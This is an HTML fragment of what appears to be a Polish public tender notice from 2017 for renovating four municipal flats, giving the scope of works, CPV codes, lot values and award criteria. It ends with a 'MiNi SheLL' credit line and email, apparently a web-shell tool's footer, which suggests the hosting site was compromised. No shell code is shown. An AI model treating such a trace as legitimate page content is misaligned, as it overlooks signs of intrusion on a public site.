              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty poprzez zmianę terminu realizacji umowy w przypadku działania osób trzecich uniemożliwiającego realizację zamówienia z przyczyn niezależnych od Zamawiającego i Wykonawcy; termin przedłużenia realizacji przedmiotu umowy możliwy jest o liczbę dni kalendarzowych obejmujący okres tego działania.
2.  Podstawą do zmiany terminu realizacji umowy  jest zgłoszenie Zamawiającemu  przerwania robót budowlanych przez Wykonawcę w dacie ich przerwania ze wskazaniem przyczyny ich wstrzymania. Przyczyny wstrzymania robót muszą być potwierdzone każdorazowo przez Zamawiającego w formie pisemnej. Zgłoszenia dokonane po upływie terminu wykonania umowy są bezskuteczne. Przedłużenie terminu nastąpi w oparciu o aneks do umowy. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/02/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Remont lokalu mieszkalnego przy ul. Zebrzydowickiej 2b/3 <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres przedmiotu zamówienia obejmuje:
1)	roboty murowe:
a)	zamurowanie przebić,
b)	uzupełnienie ścianek działowych,

2)	roboty z prefabrykatów gipsowych:
a)	wytyczenie przebiegu ścianek działowych zgodnie z wytycznymi inspektora nadzoru,
b)	zamocowanie konstrukcji z profili aluminiowych o szerokości 100 mm,
c)	wykonanie wzmocnienia z profili UA w miejscu otworów drzwiowych,
d)	wypełnienie szkieletu wełną mineralną grubości 100 mm,
e)	zamocowanie płyt gipsowo-kartonowych do konstrukcji  obustronne pojedyncze płytowane,
f)	zabezpieczeniem spoin taśmą zbrojącą oraz zaszpachlowanie połączeń,
3)	roboty tynkarskie:
a)	dokonanie oczyszczenia i odpylenia powierzchni,
b)	wykonanie powłoki gruntującej,
c)	wykonanie tynków,
4)	stolarka budowlana:
a)	demontaż istniejącej stolarki okiennej i drzwiowej,
b)	osadzenie ościeżnic aluminiowych, stalowych, drewnianych i PCV dla skrzydeł okiennych i drzwiowych,
c)	montaż i regulacja skrzydeł okiennych i drzwiowych,
d)	montaż parapetów,
e)	wykończenie ościeżnic,
5)	okładziny ceramiczne:
a)	gruntowanie podłoża,
b)	wykończenie okładzin ścian płytkami ceramicznymi,
c)	montaż listew narożnych zewnętrznych i wewnętrznych (frazowanie krawędzi wypukłych),
d)	wykonanie spoinowania,
6)	posadzki:
a)	usunięcie warstwy wykończeniowej  płytki ceramiczne,
b)	usunięcie gruzu z budynku,
c)	wywiezienie gruzu i odpadów z terenów rozbiórki,
d)	gruntowanie podłoża,
e)	przygotowanie podłoża,
f)	wykonanie wylewki samopoziomującej,
g)	wykonanie cokolików z płytek gresowych, wraz z ułożeniem listwy wykańczającej, spionowaniem oraz uszczelnieniem masą elastyczną,
7)	posadzki  panele podłogowe:
a)	oczyszczenie oraz przygotowanie podłoża pod posadzki z paneli,
b)	ułożenie warstwy z pianki wygłuszającej,
c)	ułożenie paneli podłogowych,
d)	montaż listew wykańczających w kolorze paneli podłogowych,
e)	   zabezpieczenie posadzki do czasu odbioru robót,
8)	roboty malarskie ścian i sufitów,
9)	instalacje wody zimnej ciepłej oraz kanalizacji sanitarnej:
a)	demontaż rurociągów i przyborów sanitarnych,
b)	montaż przewodów instalacji wody zimnej i ciepłej z rur PP,
c)	izolacja cieplna przewodów otulinami,
d)    montaż armatury:
       - odcinającej  zawory kulowe, zwrotny antyskażeniowy EA,
       - czerpanej  baterie umywalkowe, zlewozmywakowe, natryskowe, zawory czerpane ze   
       złączka do węża,
    e) montaż przewodów kanalizacyjnych na ścianach i w podłodze z rur PVC w tym:
    - podejść odpływowych,
    - pionów kanalizacyjnych,
     f) montaż przyborów i urządzeń sanitarnych: umywalki, zlewozmywaka, brodzika natryskowego, miski ustępowej, czyszczaków, zaworów powietrznych,
    g) montaż wodomierza skrzydełkowego,
    h) próba szczelności i płukanie instalacji,
    i) roboty towarzyszące, wykończeniowe:
   - przebicie i zabetonowanie otworów w ścianach,
   - wykucie i zabetonowanie bruzd w ścianach i posadzkach,
   - wywóz i utylizacja gruzu,
10) instalacja centralnego ogrzewania:
a)	montaż rurociągów miedzianych na ścianach,
b)	montaż grzejników stalowych płytowych typu VM i C-STD,
c)	montaż armatury:
- regulacyjnej: zaworów i głowic termostatycznych, zaworów STAD,
- odcinającej: zaworów kulowych, zaworów powrotnych, zestawów przyłączeniowych,
d)	izolacja cieplna przewodów otulinami,
e)	płukanie, próba szczelności i próba na gorąco instalacji z dokonaniem regulacji,
       f)  roboty towarzyszące, wykończeniowe:
           - wykucie wnęk w ścianach,
           - przebicia instalacyjne przez ściany,
           - bruzdy w ścianach i posadzkach,
           - wywóz i utylizacja gruzu,
11) instalacja gazowa:
a)	montaż rurociągów stalowych i miedzianych na ścianach,
b)	montaż zaworów odcinających kulkowych gazowych,
c)	podłączenie kotła gazu do c.w.u.,
d)	próby szczelności instalacji gazowej i odbiór,
            e)  roboty towarzyszące:
                - zabezpieczenie antykorozyjne rurociągów,
                - przebicie otworów w ścianach i stropach,
    - wywóz i utylizacja gruzu.
12) instalacja elektryczna:
	a) demontaż opraw oświetleniowych we wszystkich pomieszczeniach remontowanych,
b) demontaż starych przewodów elektrycznych oraz kabli strukturalnych w remontowanych pomieszczeniach ,
c) demontaż istniejącego osprzętu (łączniki światła, przewody elektryczne podtynkowe, gniazdka elektryczne),
d) montaż instalacji elektrycznych (układanie podtynkowych przewodów elektrycznych, osadzenie puszek podtynkowych),
e) montaż osprzętu elektrycznego (nowe gniazda elektryczne, łączniki oświetlenia),
f) montaż tablicy wnękowej w ścianie,
g) wykonanie pomiarów powykonawczych. 
Szczegółowy zakres zamówienia precyzują: specyfikacja techniczna wykonania i odbioru robót oraz przedmiary robót.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45442100-8,
                    45330000-9,
                    45333000-0,
                    45331100-7,
                    45311200-2,
                    45421000-4,
                    45432110-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  55876.54<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 60<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja na roboty budowlane</td><td>10</td></tr><tr><td>Gwarancja na urządzenia i przybory</td><td>10</td></tr><tr><td>Termin</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Remont lokalu mieszkalnego przy ul. Zebrzydowickiej 10/1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres przedmiotu zamówienia obejmuje:
1)	roboty murowe:
a)	zamurowanie przebić,
b)	uzupełnienie ścianek działowych,

2)	roboty z prefabrykatów gipsowych:
a)	wytyczenie przebiegu ścianek działowych zgodnie z wytycznymi inspektora nadzoru,
b)	zamocowanie konstrukcji z profili aluminiowych o szerokości 100 mm,
c)	wykonanie wzmocnienia z profili UA w miejscu otworów drzwiowych,
d)	wypełnienie szkieletu wełną mineralną grubości 100 mm,
e)	zamocowanie płyt gipsowo-kartonowych do konstrukcji  obustronne pojedyncze płytowane,
f)	zabezpieczeniem spoin taśmą zbrojącą oraz zaszpachlowanie połączeń,
3)	roboty tynkarskie:
a)	dokonanie oczyszczenia i odpylenia powierzchni,
b)	wykonanie powłoki gruntującej,
c)	wykonanie tynków,
4)	stolarka budowlana:
a)	demontaż istniejącej stolarki okiennej i drzwiowej,
b)	osadzenie ościeżnic aluminiowych, stalowych, drewnianych i PCV dla skrzydeł okiennych i drzwiowych,
c)	montaż i regulacja skrzydeł okiennych i drzwiowych,
d)	montaż parapetów,
e)	wykończenie ościeżnic,
5)	okładziny ceramiczne:
a)	gruntowanie podłoża,
b)	wykończenie okładzin ścian płytkami ceramicznymi,
c)	montaż listew narożnych zewnętrznych i wewnętrznych (frazowanie krawędzi wypukłych),
d)	wykonanie spoinowania,
6)	posadzki:
a)	usunięcie warstwy wykończeniowej  płytki ceramiczne,
b)	usunięcie gruzu z budynku,
c)	wywiezienie gruzu i odpadów z terenów rozbiórki,
d)	gruntowanie podłoża,
e)	przygotowanie podłoża,
f)	wykonanie wylewki samopoziomującej,
g)	wykonanie cokolików z płytek gresowych, wraz z ułożeniem listwy wykańczającej, spionowaniem oraz uszczelnieniem masą elastyczną,
7)	posadzki  panele podłogowe:
a)	oczyszczenie oraz przygotowanie podłoża pod posadzki z paneli,
b)	ułożenie warstwy z pianki wygłuszającej,
c)	ułożenie paneli podłogowych,
d)	montaż listew wykańczających w kolorze paneli podłogowych,
e)	   zabezpieczenie posadzki do czasu odbioru robót,
8)	roboty malarskie ścian i sufitów,
9)	instalacje wody zimnej ciepłej oraz kanalizacji sanitarnej:
a)	demontaż rurociągów i przyborów sanitarnych,
b)	montaż przewodów instalacji wody zimnej i ciepłej z rur PP,
c)	izolacja cieplna przewodów otulinami,
d)    montaż armatury:
       - odcinającej  zawory kulowe, zwrotny antyskażeniowy EA,
       - czerpanej  baterie umywalkowe, zlewozmywakowe, natryskowe, zawory czerpane ze   
       złączka do węża,
    e) montaż przewodów kanalizacyjnych na ścianach i w podłodze z rur PVC w tym:
    - podejść odpływowych,
    - pionów kanalizacyjnych,
     f) montaż przyborów i urządzeń sanitarnych: umywalki, zlewozmywaka, brodzika natryskowego, miski ustępowej, czyszczaków, zaworów powietrznych,
    g) montaż wodomierza skrzydełkowego,
    h) próba szczelności i płukanie instalacji,
    i) roboty towarzyszące, wykończeniowe:
   - przebicie i zabetonowanie otworów w ścianach,
   - wykucie i zabetonowanie bruzd w ścianach i posadzkach,
   - wywóz i utylizacja gruzu,
10) instalacja centralnego ogrzewania:
a)	montaż rurociągów miedzianych na ścianach,
b)	montaż grzejników stalowych płytowych typu VM i C-STD,
c)	montaż armatury:
- regulacyjnej: zaworów i głowic termostatycznych, zaworów STAD,
- odcinającej: zaworów kulowych, zaworów powrotnych, zestawów przyłączeniowych,
d)	izolacja cieplna przewodów otulinami,
e)	płukanie, próba szczelności i próba na gorąco instalacji z dokonaniem regulacji,
       f)  roboty towarzyszące, wykończeniowe:
           - wykucie wnęk w ścianach,
           - przebicia instalacyjne przez ściany,
           - bruzdy w ścianach i posadzkach,
           - wywóz i utylizacja gruzu,
11) instalacja gazowa:
a)	montaż rurociągów stalowych i miedzianych na ścianach,
b)	montaż zaworów odcinających kulkowych gazowych,
c)	podłączenie kotła gazu do c.w.u.,
d)	próby szczelności instalacji gazowej i odbiór,
            e)  roboty towarzyszące:
                - zabezpieczenie antykorozyjne rurociągów,
                - przebicie otworów w ścianach i stropach,
    - wywóz i utylizacja gruzu.
12) instalacja elektryczna:
	a) demontaż opraw oświetleniowych we wszystkich pomieszczeniach remontowanych,
b) demontaż starych przewodów elektrycznych oraz kabli strukturalnych w remontowanych pomieszczeniach ,
c) demontaż istniejącego osprzętu (łączniki światła, przewody elektryczne podtynkowe, gniazdka elektryczne),
d) montaż instalacji elektrycznych (układanie podtynkowych przewodów elektrycznych, osadzenie puszek podtynkowych),
e) montaż osprzętu elektrycznego (nowe gniazda elektryczne, łączniki oświetlenia),
f) montaż tablicy wnękowej w ścianie,
g) wykonanie pomiarów powykonawczych. 
Szczegółowy zakres zamówienia precyzują: specyfikacja techniczna wykonania i odbioru robót oraz przedmiary robót.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45442100-8,
                    45330000-9,
                    45333000-0,
                    45331100-7,
                    45311200-2,
                    45421000-4,
                    45432110-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  45643.05<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 60<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja na roboty budowlane</td><td>10</td></tr><tr><td>Gwarancja na urządzenia i przybory</td><td>10</td></tr><tr><td>Termin</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Remont lokalu mieszkalnego przy ul. Zebrzydowickiej 22/1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres przedmiotu zamówienia obejmuje:
1)	roboty murowe:
a)	zamurowanie przebić,
b)	uzupełnienie ścianek działowych,

2)	roboty z prefabrykatów gipsowych:
a)	wytyczenie przebiegu ścianek działowych zgodnie z wytycznymi inspektora nadzoru,
b)	zamocowanie konstrukcji z profili aluminiowych o szerokości 100 mm,
c)	wykonanie wzmocnienia z profili UA w miejscu otworów drzwiowych,
d)	wypełnienie szkieletu wełną mineralną grubości 100 mm,
e)	zamocowanie płyt gipsowo-kartonowych do konstrukcji  obustronne pojedyncze płytowane,
f)	zabezpieczeniem spoin taśmą zbrojącą oraz zaszpachlowanie połączeń,
3)	roboty tynkarskie:
a)	dokonanie oczyszczenia i odpylenia powierzchni,
b)	wykonanie powłoki gruntującej,
c)	wykonanie tynków,
4)	stolarka budowlana:
a)	demontaż istniejącej stolarki okiennej i drzwiowej,
b)	osadzenie ościeżnic aluminiowych, stalowych, drewnianych i PCV dla skrzydeł okiennych i drzwiowych,
c)	montaż i regulacja skrzydeł okiennych i drzwiowych,
d)	montaż parapetów,
e)	wykończenie ościeżnic,
5)	okładziny ceramiczne:
a)	gruntowanie podłoża,
b)	wykończenie okładzin ścian płytkami ceramicznymi,
c)	montaż listew narożnych zewnętrznych i wewnętrznych (frazowanie krawędzi wypukłych),
d)	wykonanie spoinowania,
6)	posadzki:
a)	usunięcie warstwy wykończeniowej  płytki ceramiczne,
b)	usunięcie gruzu z budynku,
c)	wywiezienie gruzu i odpadów z terenów rozbiórki,
d)	gruntowanie podłoża,
e)	przygotowanie podłoża,
f)	wykonanie wylewki samopoziomującej,
g)	wykonanie cokolików z płytek gresowych, wraz z ułożeniem listwy wykańczającej, spionowaniem oraz uszczelnieniem masą elastyczną,
7)	posadzki  panele podłogowe:
a)	oczyszczenie oraz przygotowanie podłoża pod posadzki z paneli,
b)	ułożenie warstwy z pianki wygłuszającej,
c)	ułożenie paneli podłogowych,
d)	montaż listew wykańczających w kolorze paneli podłogowych,
e)	   zabezpieczenie posadzki do czasu odbioru robót,
8)	roboty malarskie ścian i sufitów,
9)	instalacje wody zimnej ciepłej oraz kanalizacji sanitarnej:
a)	demontaż rurociągów i przyborów sanitarnych,
b)	montaż przewodów instalacji wody zimnej i ciepłej z rur PP,
c)	izolacja cieplna przewodów otulinami,
d)    montaż armatury:
       - odcinającej  zawory kulowe, zwrotny antyskażeniowy EA,
       - czerpanej  baterie umywalkowe, zlewozmywakowe, natryskowe, zawory czerpane ze   
       złączka do węża,
    e) montaż przewodów kanalizacyjnych na ścianach i w podłodze z rur PVC w tym:
    - podejść odpływowych,
    - pionów kanalizacyjnych,
     f) montaż przyborów i urządzeń sanitarnych: umywalki, zlewozmywaka, brodzika natryskowego, miski ustępowej, czyszczaków, zaworów powietrznych,
    g) montaż wodomierza skrzydełkowego,
    h) próba szczelności i płukanie instalacji,
    i) roboty towarzyszące, wykończeniowe:
   - przebicie i zabetonowanie otworów w ścianach,
   - wykucie i zabetonowanie bruzd w ścianach i posadzkach,
   - wywóz i utylizacja gruzu,
10) instalacja centralnego ogrzewania:
a)	montaż rurociągów miedzianych na ścianach,
b)	montaż grzejników stalowych płytowych typu VM i C-STD,
c)	montaż armatury:
- regulacyjnej: zaworów i głowic termostatycznych, zaworów STAD,
- odcinającej: zaworów kulowych, zaworów powrotnych, zestawów przyłączeniowych,
d)	izolacja cieplna przewodów otulinami,
e)	płukanie, próba szczelności i próba na gorąco instalacji z dokonaniem regulacji,
       f)  roboty towarzyszące, wykończeniowe:
           - wykucie wnęk w ścianach,
           - przebicia instalacyjne przez ściany,
           - bruzdy w ścianach i posadzkach,
           - wywóz i utylizacja gruzu,
11) instalacja gazowa:
a)	montaż rurociągów stalowych i miedzianych na ścianach,
b)	montaż zaworów odcinających kulkowych gazowych,
c)	podłączenie kotła gazu do c.w.u.,
d)	próby szczelności instalacji gazowej i odbiór,
            e)  roboty towarzyszące:
                - zabezpieczenie antykorozyjne rurociągów,
                - przebicie otworów w ścianach i stropach,
    - wywóz i utylizacja gruzu.
12) instalacja elektryczna:
	a) demontaż opraw oświetleniowych we wszystkich pomieszczeniach remontowanych,
b) demontaż starych przewodów elektrycznych oraz kabli strukturalnych w remontowanych pomieszczeniach ,
c) demontaż istniejącego osprzętu (łączniki światła, przewody elektryczne podtynkowe, gniazdka elektryczne),
d) montaż instalacji elektrycznych (układanie podtynkowych przewodów elektrycznych, osadzenie puszek podtynkowych),
e) montaż osprzętu elektrycznego (nowe gniazda elektryczne, łączniki oświetlenia),
f) montaż tablicy wnękowej w ścianie,
g) wykonanie pomiarów powykonawczych. 
Szczegółowy zakres zamówienia precyzują: specyfikacja techniczna wykonania i odbioru robót oraz przedmiary robót.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45442100-8,
                    45330000-9,
                    45333000-0,
                    45331100-7,
                    45311200-2,
                    45421000-4,
                    45432110-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  48778.13<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 60<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja na roboty budowlane</td><td>10</td></tr><tr><td>Gwarancja na urządzenia i przybory</td><td>10</td></tr><tr><td>Termin</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Remont lokalu mieszkalnego przy ul. Morcinka 23A/15<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres przedmiotu zamówienia obejmuje:
1)	roboty murowe:
a)	zamurowanie przebić,
b)	uzupełnienie ścianek działowych,

2)	roboty z prefabrykatów gipsowych:
a)	wytyczenie przebiegu ścianek działowych zgodnie z wytycznymi inspektora nadzoru,
b)	zamocowanie konstrukcji z profili aluminiowych o szerokości 100 mm,
c)	wykonanie wzmocnienia z profili UA w miejscu otworów drzwiowych,
d)	wypełnienie szkieletu wełną mineralną grubości 100 mm,
e)	zamocowanie płyt gipsowo-kartonowych do konstrukcji  obustronne pojedyncze płytowane,
f)	zabezpieczeniem spoin taśmą zbrojącą oraz zaszpachlowanie połączeń,
3)	roboty tynkarskie:
a)	dokonanie oczyszczenia i odpylenia powierzchni,
b)	wykonanie powłoki gruntującej,
c)	wykonanie tynków,
4)	stolarka budowlana:
a)	demontaż istniejącej stolarki okiennej i drzwiowej,
b)	osadzenie ościeżnic aluminiowych, stalowych, drewnianych i PCV dla skrzydeł okiennych i drzwiowych,
c)	montaż i regulacja skrzydeł okiennych i drzwiowych,
d)	montaż parapetów,
e)	wykończenie ościeżnic,
5)	okładziny ceramiczne:
a)	gruntowanie podłoża,
b)	wykończenie okładzin ścian płytkami ceramicznymi,
c)	montaż listew narożnych zewnętrznych i wewnętrznych (frazowanie krawędzi wypukłych),
d)	wykonanie spoinowania,
6)	posadzki:
a)	usunięcie warstwy wykończeniowej  płytki ceramiczne,
b)	usunięcie gruzu z budynku,
c)	wywiezienie gruzu i odpadów z terenów rozbiórki,
d)	gruntowanie podłoża,
e)	przygotowanie podłoża,
f)	wykonanie wylewki samopoziomującej,
g)	wykonanie cokolików z płytek gresowych, wraz z ułożeniem listwy wykańczającej, spionowaniem oraz uszczelnieniem masą elastyczną,
7)	posadzki  panele podłogowe:
a)	oczyszczenie oraz przygotowanie podłoża pod posadzki z paneli,
b)	ułożenie warstwy z pianki wygłuszającej,
c)	ułożenie paneli podłogowych,
d)	montaż listew wykańczających w kolorze paneli podłogowych,
e)	   zabezpieczenie posadzki do czasu odbioru robót,
8)	roboty malarskie ścian i sufitów,
9)	instalacje wody zimnej ciepłej oraz kanalizacji sanitarnej:
a)	demontaż rurociągów i przyborów sanitarnych,
b)	montaż przewodów instalacji wody zimnej i ciepłej z rur PP,
c)	izolacja cieplna przewodów otulinami,
d)    montaż armatury:
       - odcinającej  zawory kulowe, zwrotny antyskażeniowy EA,
       - czerpanej  baterie umywalkowe, zlewozmywakowe, natryskowe, zawory czerpane ze   
       złączka do węża,
    e) montaż przewodów kanalizacyjnych na ścianach i w podłodze z rur PVC w tym:
    - podejść odpływowych,
    - pionów kanalizacyjnych,
     f) montaż przyborów i urządzeń sanitarnych: umywalki, zlewozmywaka, brodzika natryskowego, miski ustępowej, czyszczaków, zaworów powietrznych,
    g) montaż wodomierza skrzydełkowego,
    h) próba szczelności i płukanie instalacji,
    i) roboty towarzyszące, wykończeniowe:
   - przebicie i zabetonowanie otworów w ścianach,
   - wykucie i zabetonowanie bruzd w ścianach i posadzkach,
   - wywóz i utylizacja gruzu,
10) instalacja centralnego ogrzewania:
a)	montaż rurociągów miedzianych na ścianach,
b)	montaż grzejników stalowych płytowych typu VM i C-STD,
c)	montaż armatury:
- regulacyjnej: zaworów i głowic termostatycznych, zaworów STAD,
- odcinającej: zaworów kulowych, zaworów powrotnych, zestawów przyłączeniowych,
d)	izolacja cieplna przewodów otulinami,
e)	płukanie, próba szczelności i próba na gorąco instalacji z dokonaniem regulacji,
       f)  roboty towarzyszące, wykończeniowe:
           - wykucie wnęk w ścianach,
           - przebicia instalacyjne przez ściany,
           - bruzdy w ścianach i posadzkach,
           - wywóz i utylizacja gruzu,
11) instalacja gazowa:
a)	montaż rurociągów stalowych i miedzianych na ścianach,
b)	montaż zaworów odcinających kulkowych gazowych,
c)	podłączenie kotła gazu do c.w.u.,
d)	próby szczelności instalacji gazowej i odbiór,
            e)  roboty towarzyszące:
                - zabezpieczenie antykorozyjne rurociągów,
                - przebicie otworów w ścianach i stropach,
    - wywóz i utylizacja gruzu.
12) instalacja elektryczna:
	a) demontaż opraw oświetleniowych we wszystkich pomieszczeniach remontowanych,
b) demontaż starych przewodów elektrycznych oraz kabli strukturalnych w remontowanych pomieszczeniach ,
c) demontaż istniejącego osprzętu (łączniki światła, przewody elektryczne podtynkowe, gniazdka elektryczne),
d) montaż instalacji elektrycznych (układanie podtynkowych przewodów elektrycznych, osadzenie puszek podtynkowych),
e) montaż osprzętu elektrycznego (nowe gniazda elektryczne, łączniki oświetlenia),
f) montaż tablicy wnękowej w ścianie,
g) wykonanie pomiarów powykonawczych. 
Szczegółowy zakres zamówienia precyzują: specyfikacja techniczna wykonania i odbioru robót oraz przedmiary robót.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45442100-8,
                    45330000-9,
                    45333000-0,
                    45331100-7,
                    45311200-2,
                    45421000-4,
                    45432110-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  41497.50<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 60<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja na roboty budowlane</td><td>10</td></tr><tr><td>Gwarancja na urządzenia i przybory</td><td>10</td></tr><tr><td>Termin</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com